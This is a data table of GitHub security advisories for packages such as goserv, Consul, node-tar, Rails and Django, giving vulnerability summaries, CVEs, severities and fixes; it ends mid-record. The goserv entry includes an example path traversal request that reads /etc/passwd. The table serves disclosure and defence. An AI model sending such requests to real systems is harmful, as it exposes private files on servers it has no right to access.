ecosystem stringclasses 14 values | vuln_id stringlengths 10 19 | summary stringlengths 4 267 ⌀ | details stringlengths 9 13.5k | aliases stringlengths 17 144 ⌀ | modified_date stringdate 2010-05-27 05:47:00 2022-05-10 08:46:52 | published_date stringdate 2005-12-31 05:00:00 2022-05-10 08:46:50 | severity stringclasses 5 values | score float64 0 10 ⌀ | cwe_id stringclasses 988 values | refs stringlengths 30 17.7k ⌀ | introduced stringlengths 75 4.26k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA | GHSA-pwqj-h62h-q35c | Directory Traversal in goserv | Affected versions of `goserv` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | {'CVE-2017-16133'} | 2021-01-08T18:18:56Z | 2018-07-23T20:49:03Z | HIGH | 0 | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-16133', 'https://github.com/advisories/GHSA-pwqj-h62h-q35c', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/goserv', 'https://nodesecurity.io/advisories/473', 'https://www.npmjs.com/advisories/473'} | null |
GHSA | GHSA-6hw5-6gcx-phmw | HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic. | HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic. Fixed in 1.8.15, 1.9.9 and 1.10.2. | {'CVE-2021-38698'} | 2021-09-16T18:57:25Z | 2021-09-08T20:14:56Z | MODERATE | 6.5 | {'CWE-863'} | {'https://discuss.hashicorp.com/t/hcsec-2021-24-consul-missing-authorization-check-on-txn-apply-endpoint/29026', 'https://github.com/hashicorp/consul/pull/10824', 'https://www.hashicorp.com/blog/category/consul', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38698', 'https://github.com/advisories/GHSA-6hw5-6gcx-phmw'} | null |
GHSA | GHSA-2hw2-62cp-p9p7 | Access control bypass in Apache ZooKeeper | An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper?s getACL() command doesn?t check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users. | {'CVE-2019-0201'} | 2021-08-26T15:35:13Z | 2019-05-29T18:54:11Z | MODERATE | 5.9 | {'CWE-862'} | {'https://lists.apache.org/thread.html/5d9a1cf41a5880557bf680b7321b4ab9a4d206c601ffb15fef6f196a@%3Ccommits.accumulo.apache.org%3E', 'https://lists.apache.org/thread.html/r40f32125c1d97ad82404cc918171d9e0fcf78e534256674e9da1eb4b@%3Ccommon-issues.hadoop.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190619-0001/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0201', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://zookeeper.apache.org/security.html#CVE-2019-0201', 'https://github.com/advisories/GHSA-2hw2-62cp-p9p7', 'https://seclists.org/bugtraq/2019/Jun/13', 'https://lists.apache.org/thread.html/f6112882e30a31992a79e0a8c31ac179e9d0de7c708de3a9258d4391@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://lists.debian.org/debian-lts-announce/2019/05/msg00033.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://www.debian.org/security/2019/dsa-4461', 'https://access.redhat.com/errata/RHSA-2019:4352', 'https://access.redhat.com/errata/RHSA-2019:3140', 'https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'http://www.securityfocus.com/bid/108427', 'https://issues.apache.org/jira/browse/ZOOKEEPER-1392'} | null |
GHSA | GHSA-q8pj-2vqx-8ggc | Denial of service in css-what | The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input. | {'CVE-2021-33587'} | 2021-12-02T17:48:50Z | 2021-06-07T22:11:39Z | HIGH | 7.5 | {'CWE-400'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-33587', 'https://security.netapp.com/advisory/ntap-20210706-0007/', 'https://github.com/fb55/css-what/commit/4cdaacfd0d4b6fd00614be030da0dea6c2994655', 'https://github.com/advisories/GHSA-q8pj-2vqx-8ggc', 'https://github.com/fb55/css-what/releases/tag/v5.0.1'} | null |
GHSA | GHSA-85r7-w5mv-c849 | Moderate severity vulnerability that affects rack | rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before 1.4.5 allows attackers to access arbitrary files outside the intended root directory via a crafted PATH_INFO environment variable, probably a directory traversal vulnerability that is remotely exploitable, aka "symlink path traversals." | {'CVE-2013-0262'} | 2021-09-03T22:59:00Z | 2017-10-24T18:33:37Z | MODERATE | 0 | {'CWE-22'} | {'https://github.com/rack/rack/commit/6f237e4c9fab649d3750482514f0fde76c56ab30', 'https://bugzilla.redhat.com/show_bug.cgi?id=909071', 'https://bugzilla.redhat.com/show_bug.cgi?id=909072', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0262', 'https://gist.github.com/rentzsch/4736940', 'https://github.com/advisories/GHSA-85r7-w5mv-c849', 'https://groups.google.com/forum/#!msg/rack-devel/bf937jPZxJM/1s6x95vIhmAJ', 'http://secunia.com/advisories/52033', 'https://groups.google.com/forum/#!msg/rack-devel/mZsuRonD7G8/DpZIOmMLbOgJ', 'http://lists.opensuse.org/opensuse-updates/2013-03/msg00048.html', 'https://github.com/rack/rack/blob/master/lib/rack/file.rb#L56', 'http://rack.github.com/'} | null |
GHSA | GHSA-gp6w-ccqv-p7qr | firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF) | firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF) | {'CVE-2021-3729'} | 2021-08-25T14:49:58Z | 2021-08-25T14:49:58Z | MODERATE | 4.3 | {'CWE-352'} | {'https://github.com/firefly-iii/firefly-iii/commit/06d319cd71b7787aa919b3ba1ccf51e4ade67712', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3729', 'https://github.com/advisories/GHSA-gp6w-ccqv-p7qr', 'https://huntr.dev/bounties/d32f3d5a-0738-41ba-89de-34f2a772de76'} | null |
GHSA | GHSA-mh33-7rrq-662w | Improper Certificate Validation | The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument. | {'CVE-2019-11324'} | 2021-06-16T19:56:58Z | 2019-04-19T16:55:10Z | HIGH | 7.5 | {'CWE-295'} | {'https://github.com/urllib3/urllib3/compare/a6ec68a...1efadf4', 'https://access.redhat.com/errata/RHSA-2019:3335', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOSA2NT4DUQDBEIWE6O7KKD24XND7TE2/', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html', 'https://pypi.org/project/urllib3/1.24.2/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NKGPJLVLVYCL4L4B4G5TIOTVK4BKPG72/', 'http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html', 'http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html', 'https://access.redhat.com/errata/RHSA-2019:3590', 'http://www.openwall.com/lists/oss-security/2019/04/19/1', 'https://usn.ubuntu.com/3990-1/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11324', 'https://github.com/advisories/GHSA-mh33-7rrq-662w'} | null |
GHSA | GHSA-7pr3-p5fm-8r9x | LiveQuery publishes user session tokens in parse-server | ### Impact
For regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload.
### Patches
Remove session token from LiveQuery payload.
### Workaround
Set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up. | {'CVE-2021-41109'} | 2022-04-19T19:03:10Z | 2021-09-30T17:09:47Z | HIGH | 7.5 | {'CWE-200'} | {'https://github.com/parse-community/parse-server/releases/tag/4.10.4', 'https://github.com/advisories/GHSA-7pr3-p5fm-8r9x', 'https://github.com/parse-community/parse-server/security/advisories/GHSA-7pr3-p5fm-8r9x', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41109', 'https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559'} | null |
GHSA | GHSA-v5m7-53cv-f3hx | Undefined Behavior crossbeam-channel | ### Impact
The affected version of this crate's the `bounded` channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements.
### Patches
This has been fixed in crossbeam-channel 0.4.4.
We recommend users to upgrade to 0.4.4.
### References
See https://github.com/crossbeam-rs/crossbeam/pull/533, https://github.com/crossbeam-rs/crossbeam/issues/539, and https://github.com/RustSec/advisory-db/pull/425 for more details.
| {'CVE-2020-15254'} | 2021-12-17T19:38:01Z | 2021-08-25T21:01:13Z | HIGH | 8.1 | {'CWE-119'} | {'https://github.com/crossbeam-rs/crossbeam/pull/533', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15254', 'https://github.com/advisories/GHSA-v5m7-53cv-f3hx', 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-v5m7-53cv-f3hx', 'https://github.com/RustSec/advisory-db/pull/425', 'https://github.com/crossbeam-rs/crossbeam/issues/539', 'https://rustsec.org/advisories/RUSTSEC-2020-0052.html'} | null |
GHSA | GHSA-9r2w-394v-53qc | Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links | ### Impact
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.
This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\` and `/` characters as path separators, however `\` is a valid filename character on posix systems.
By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.
Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.
These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.
The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.
### Patches
4.4.16 || 5.0.8 || 6.1.7
### Workarounds
Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.
```js
const tar = require('tar')
tar.x({
file: 'archive.tgz',
filter: (file, entry) => {
if (entry.type === 'SymbolicLink') {
return false
} else {
return true
}
}
})
```
Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.
### Fix
The problem is addressed in the following ways:
1. All paths are normalized to use `/` as a path separator, replacing `\` with `/` on Windows systems, and leaving `\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.
2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.
#### Caveat
Note that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.
Users are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another. | {'CVE-2021-37701'} | 2022-03-11T20:20:35Z | 2021-08-31T16:05:27Z | HIGH | 8.2 | {'CWE-59', 'CWE-22'} | {'https://www.npmjs.com/package/tar', 'https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.debian.org/security/2021/dsa-5008', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37701', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/advisories/GHSA-9r2w-394v-53qc'} | null |
GHSA | GHSA-ghm8-mmx7-xvg2 | Information Exposure in Apache Tapestry | Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1. | {'CVE-2021-30638'} | 2022-03-21T20:43:26Z | 2022-03-18T17:53:58Z | HIGH | 7.5 | {'CWE-200'} | {'http://www.openwall.com/lists/oss-security/2021/04/27/3', 'https://lists.apache.org/thread.html/r37dab61fc7f7088d4311e7f995ef4117d58d86a675f0256caa6991eb%40%3Cusers.tapestry.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210528-0004/', 'https://github.com/advisories/GHSA-ghm8-mmx7-xvg2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30638', 'https://www.zerodayinitiative.com/advisories/ZDI-21-491/'} | null |
GHSA | GHSA-mm44-wc5p-wqhq | Denial of service due to reference expansion in versions earlier than 4.0 | ### Impact
The CBOR library supports optional tags that enable CBOR objects to contain references to objects within them. Versions earlier than 4.0 resolved those references automatically. While this by itself doesn't cause much of a security problem, a denial of service can happen if those references are deeply nested and used multiple times (so that the same reference to the same object occurs multiple times), and if the decoded CBOR object is sent to a serialization method such as EncodeToBytes, ToString, or ToJSONString, since the objects referred to are expanded in the process and take up orders of magnitude more memory than if the references weren't resolved.
The impact of this problem on any particular system varies. In general, the risk is higher if the system allows users to send arbitrary CBOR objects without authentication, or exposes a remote endpoint in which arbitrary CBOR objects can be sent without authentication.
### Patches
This problem is addressed in version 4.0 by disabling reference resolution by default. Users should use the latest version of this library.
### Workarounds
Since version 3.6, an encoding option (`resolvereferences=true` or `resolvereferences=false`) in CBOREncodeOptions sets whether the CBOR processor will resolve these kinds of references when decoding a CBOR object. Set `resolvereferences=false` to disable reference resolution.
In version 3.6, if the method used CBORObject.Read() or CBORObject.DecodeFromBytes() to decode a serialized CBOR object, call the overload that takes CBOREncodeOptions as follows:
CBORObject.DecodeFromBytes(bytes, new CBOREncodeOptions("resolvereferences=false"));
In versions 3.5 and earlier, this issue is present only if the CBOR object is an array or a map. If the application does not expect a decoded CBOR object to be an array or a map, it should check the CBOR object's type before encoding that object, as follows:
if (cbor.Type != CBORType.Array && cbor.Type != CBORType.Map) {
cbor.EncodeToBytes();
}
Alternatively, for such versions, the application can use WriteTo to decode the CBOR object to a so-called "limited memory stream", that is, a Stream that throws an exception if too many bytes would be written. How to write such a limited-memory stream is nontrivial and beyond the scope of this advisory.
LimitedMemoryStream stream = new LimitedMemoryStream(100000); // Limit to 100000 bytes
cbor.WriteTo(stream);
return stream.ToBytes();
To check whether a byte array representing a CBOR object might exhibit this problem, check whether the array contains the byte 0xd8 followed immediately by either 0x19 or 0x1d. This check catches all affected CBOR objects but may catch some non-affected CBOR objects (notably integers and byte strings).
### References
See the Wikipedia article [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) and the related issue in [Kubernetes](https://github.com/kubernetes/kubernetes/issues/83253).
### For more information
If you have any questions or comments about this advisory, open an issue in [the CBOR repository](https://github.com/peteroupc/cbor-java).
| null | 2022-01-18T23:05:19Z | 2020-07-07T16:45:24Z | HIGH | 0 | null | {'https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-mm44-wc5p-wqhq', 'https://github.com/advisories/GHSA-mm44-wc5p-wqhq'} | null |
GHSA | GHSA-hv53-q76c-7f8c | OS Command Injection in OpenTSDB | A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.) | {'CVE-2020-35476'} | 2021-08-02T17:02:21Z | 2021-08-02T17:02:21Z | CRITICAL | 9.8 | {'CWE-78'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-35476', 'https://github.com/OpenTSDB/opentsdb/issues/2051', 'https://github.com/advisories/GHSA-hv53-q76c-7f8c'} | null |
GHSA | GHSA-wcp5-m52f-mhh5 | Improper Restriction of XML External Entity Reference in MPXJ | "MPXJ through 8.1.3 allows XXE attacks. This affects the GanttProjectReader and PhoenixReader components." | {'CVE-2020-25020'} | 2021-05-07T15:54:36Z | 2021-05-07T15:54:36Z | CRITICAL | 9.8 | {'CWE-611'} | {'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://github.com/advisories/GHSA-wcp5-m52f-mhh5', 'https://github.com/joniles/mpxj/releases/tag/v8.1.4', 'https://github.com/joniles/mpxj/pull/178/commits/c3e457f7a16facfe563eade82b0fa8736a8c96f9', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25020'} | null |
GHSA | GHSA-wh98-p28r-vrc9 | Exposure of information in Action Pack | ### Impact
Under certain circumstances response bodies will not be closed, for example a [bug in a webserver](https://github.com/puma/puma/pull/2812) or a bug in a Rack middleware. In the event a response is *not* notified of a `close`, `ActionDispatch::Executor` will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests, especially when interacting with `ActiveSupport::CurrentAttributes`.
Upgrading to the FIXED versions of Rails will ensure mitigation of this issue even in the context of a buggy webserver or middleware implementation.
### Patches
This has been fixed in Rails 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
### Workarounds
Upgrading is highly recommended, but to work around this problem the following middleware can be used:
```ruby
class GuardedExecutor < ActionDispatch::Executor
def call(env)
ensure_completed!
super
end
private
def ensure_completed!
@executor.new.complete! if @executor.active?
end
end
# Ensure the guard is inserted before ActionDispatch::Executor
Rails.application.configure do
config.middleware.swap ActionDispatch::Executor, GuardedExecutor, executor
end
``` | {'CVE-2022-23633'} | 2022-04-19T19:03:23Z | 2022-02-11T20:49:14Z | HIGH | 7.4 | {'CWE-200'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-23633', 'https://github.com/advisories/GHSA-wh98-p28r-vrc9', 'https://rubyonrails.org/2022/2/11/Rails-7-0-2-2-6-1-4-6-6-0-4-6-and-5-2-6-2-have-been-released', 'https://github.com/rails/rails/security/advisories/GHSA-wh98-p28r-vrc9', 'https://discuss.rubyonrails.org/t/cve-2022-23633-possible-exposure-of-information-vulnerability-in-action-pack/80016', 'http://www.openwall.com/lists/oss-security/2022/02/11/5', 'https://github.com/rails/rails/commit/f9a2ad03943d5c2ba54e1d45f155442b519c75da'} | null |
GHSA | GHSA-868x-rg4c-cjqg | Allocation of Resources Without Limits or Throttling in Apache Avro | A vulnerability in the .NET SDK of Apache Avro allows an attacker to allocate excessive resources, potentially causing a denial-of-service attack. This issue affects .NET applications using Apache Avro version 1.10.2 and prior versions. Users should update to version 1.11.0 which addresses this issue. | {'CVE-2021-43045'} | 2022-01-18T22:41:05Z | 2022-01-08T00:39:20Z | HIGH | 7.5 | {'CWE-770'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-43045', 'http://www.openwall.com/lists/oss-security/2022/01/06/8', 'https://lists.apache.org/thread/5fttw9vk6gd2p3b846nox7hcj5469xfd', 'https://github.com/advisories/GHSA-868x-rg4c-cjqg'} | null |
GHSA | GHSA-j52m-489x-v634 | Double free in linea | An issue was discovered in the linea crate through 0.9.4 for Rust. There is double free in the Matrix::zip_elements method. | {'CVE-2019-16880'} | 2021-08-25T20:44:13Z | 2021-08-25T20:44:13Z | CRITICAL | 9.8 | {'CWE-415'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-16880', 'https://github.com/advisories/GHSA-j52m-489x-v634', 'https://rustsec.org/advisories/RUSTSEC-2019-0021.html', 'https://github.com/strake/linea.rs/issues/2'} | null |
GHSA | GHSA-g973-978j-2c3p | Denial of Service in SheetJS Pro | SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js. | {'CVE-2021-32014'} | 2022-02-08T21:02:27Z | 2021-07-22T19:47:15Z | MODERATE | 5.5 | {'CWE-400', 'CWE-345'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32014', 'https://github.com/advisories/GHSA-g973-978j-2c3p', 'https://sheetjs.com/pro', 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/', 'https://www.npmjs.com/package/xlsx/v/0.17.0', 'https://www.oracle.com/security-alerts/cpujan2022.html'} | null |
GHSA | GHSA-vjrq-cg9x-rfjp | Improper Input Validation in cookie | An issue was discovered in the cookie crate before 0.7.6 for Rust. Large integers in the Max-Age of a cookie cause a panic. | {'CVE-2017-18589'} | 2021-08-25T20:43:02Z | 2021-08-25T20:43:02Z | HIGH | 7.5 | {'CWE-20'} | {'https://github.com/alexcrichton/cookie-rs/pull/86', 'https://rustsec.org/advisories/RUSTSEC-2017-0005.html', 'https://github.com/advisories/GHSA-vjrq-cg9x-rfjp', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18589'} | null |
GHSA | GHSA-49fq-pw77-6qxj | Use after free in string-interner | An issue was discovered in the string-interner crate before 0.7.1 for Rust. It allows attackers to read from memory locations associated with dangling pointers, because of a cloning flaw. | {'CVE-2019-16882'} | 2021-08-25T20:44:15Z | 2021-08-25T20:44:15Z | HIGH | 7.5 | {'CWE-416'} | {'https://github.com/Robbepop/string-interner/issues/9', 'https://github.com/advisories/GHSA-49fq-pw77-6qxj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16882', 'https://rustsec.org/advisories/RUSTSEC-2019-0023.html'} | null |
GHSA | GHSA-5jcf-c5rg-rmm8 | High severity vulnerability that affects paperclip | Paperclip ruby gem version 3.1.4 and later suffers from a Server-SIde Request Forgery (SSRF) vulnerability in the Paperclip::UriAdapter class. Attackers may be able to access information about internal network resources. | {'CVE-2017-0889'} | 2021-01-08T19:50:02Z | 2018-01-22T13:31:34Z | HIGH | 0 | {'CWE-918'} | {'https://github.com/thoughtbot/paperclip/pull/2435', 'https://hackerone.com/reports/713', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0889', 'https://hackerone.com/reports/209430', 'https://github.com/advisories/GHSA-5jcf-c5rg-rmm8'} | null |
GHSA | GHSA-hx6g-q9v2-xh7v | Information exposure in elgg | elgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor. Forms in the view namespace 'forms/admin' were not protected by an AdminGatekeeper in case of AJAX requests to 'ajax/form/admin/'. | {'CVE-2021-3980'} | 2021-12-16T15:30:48Z | 2021-12-16T15:30:48Z | HIGH | 7.5 | {'CWE-359'} | {'https://github.com/Elgg/Elgg/pull/13791', 'https://github.com/elgg/elgg/commit/572d210e2392f1fdf47ff2f38665372a6535c126', 'https://github.com/advisories/GHSA-hx6g-q9v2-xh7v', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3980', 'https://huntr.dev/bounties/1f43f11e-4bd8-451f-a244-dc9541cdc0ac'} | null |
GHSA | GHSA-mv2w-4jqc-6fg4 | Command injection in libvcs and vcspull | The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. | {'CVE-2022-21187'} | 2022-04-04T21:38:53Z | 2022-03-15T00:00:53Z | HIGH | 8.1 | {'CWE-74', 'CWE-77'} | {'https://github.com/vcs-python/vcspull/blob/master/CHANGES#vcspull-1111-2022-03-12', 'https://github.com/vcs-python/libvcs/blob/master/CHANGES#libvcs-0111-2022-03-12', 'https://github.com/vcs-python/vcspull/commit/e1b77128a1fa0754625b5f43d8bc47956f21f33e', 'https://github.com/advisories/GHSA-mv2w-4jqc-6fg4', 'https://snyk.io/vuln/SNYK-PYTHON-LIBVCS-2421204', 'https://github.com/vcs-python/libvcs/pull/306', 'https://github.com/vcs-python/libvcs/blob/v0.11.1/CHANGES%23libvcs-0111-2022-03-12', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21187'} | null |
GHSA | GHSA-xg75-q3q5-cqmv | Denial of Service in http-swagger | ### Impact
Allows an attacker to perform a DOS attack consisting of memory exhaustion on the host system.
### Patches
Yes. Please upgrade to v1.2.6.
### Workarounds
A workaround is to restrict the path prefix to the "GET" method. As shown below
```
func main() {
r := mux.NewRouter()
r.PathPrefix("/swagger/").Handler(httpSwagger.Handler(
httpSwagger.URL("http://localhost:1323/swagger/doc.json"), //The url pointing to API definition
httpSwagger.DeepLinking(true),
httpSwagger.DocExpansion("none"),
httpSwagger.DomID("#swagger-ui"),
)).Methods(http.MethodGet)
```
### References
Reporter dongguangli from https://www.huoxian.cn/ company
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [http-swagger](https://github.com/swaggo/http-swagger/issues)
| {'CVE-2022-24863'} | 2022-04-28T18:12:34Z | 2022-04-22T20:55:52Z | HIGH | 7.5 | {'CWE-400', 'CWE-755'} | {'https://github.com/swaggo/http-swagger/pull/62', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24863', 'https://github.com/swaggo/http-swagger/commit/b7d83e8fba85a7a51aa7e45e8244b4173f15049e', 'https://github.com/swaggo/http-swagger/releases/tag/v1.2.6', 'https://github.com/swaggo/http-swagger/security/advisories/GHSA-xg75-q3q5-cqmv', 'https://github.com/advisories/GHSA-xg75-q3q5-cqmv'} | null |
GHSA | GHSA-g74r-ffvr-5q9f | Memory Exposure in concat-stream | Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()`
Versions <1.3.0 are not affected due to not using unguarded Buffer constructor.
## Recommendation
Update to version 1.5.2, 1.4.11, 1.3.2 or later.
If you are unable to update make sure user provided input into the `write()` function is not a number. | null | 2021-08-04T20:40:21Z | 2019-06-03T17:26:44Z | MODERATE | 0 | {'CWE-200'} | {'https://github.com/maxogden/concat-stream/pull/47', 'https://nodesecurity.io/advisories/597', 'https://github.com/advisories/GHSA-g74r-ffvr-5q9f', 'https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85', 'https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e', 'https://www.npmjs.com/advisories/597'} | null |
GHSA | GHSA-2gwj-7jmv-h26r | SQL Injection in Django | An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs. | {'CVE-2022-28346'} | 2022-04-22T23:29:02Z | 2022-04-13T00:00:33Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://www.djangoproject.com/weblog/2022/apr/11/security-releases/', 'https://github.com/django/django/commit/93cae5cb2f9a4ef1514cf1a41f714fef08005200', 'https://github.com/advisories/GHSA-2gwj-7jmv-h26r', 'http://www.openwall.com/lists/oss-security/2022/04/11/1', 'https://docs.djangoproject.com/en/4.0/releases/security/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28346', 'https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html', 'https://groups.google.com/forum/#!forum/django-announce'} | null |
GHSA | GHSA-8rcj-c8pj-v3m3 | Reachable Assertion in Tensorflow | ### Impact
When decoding a resource handle tensor from protobuf, a TensorFlow process can encounter cases where a `CHECK` assertion is invalidated based on user controlled arguments. This allows attackers to cause denial of services in TensorFlow processes.
### Patches
We have patched the issue in GitHub commit [14fea662350e7c26eb5fe1be2ac31704e5682ee6](https://github.com/tensorflow/tensorflow/commit/14fea662350e7c26eb5fe1be2ac31704e5682ee6).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
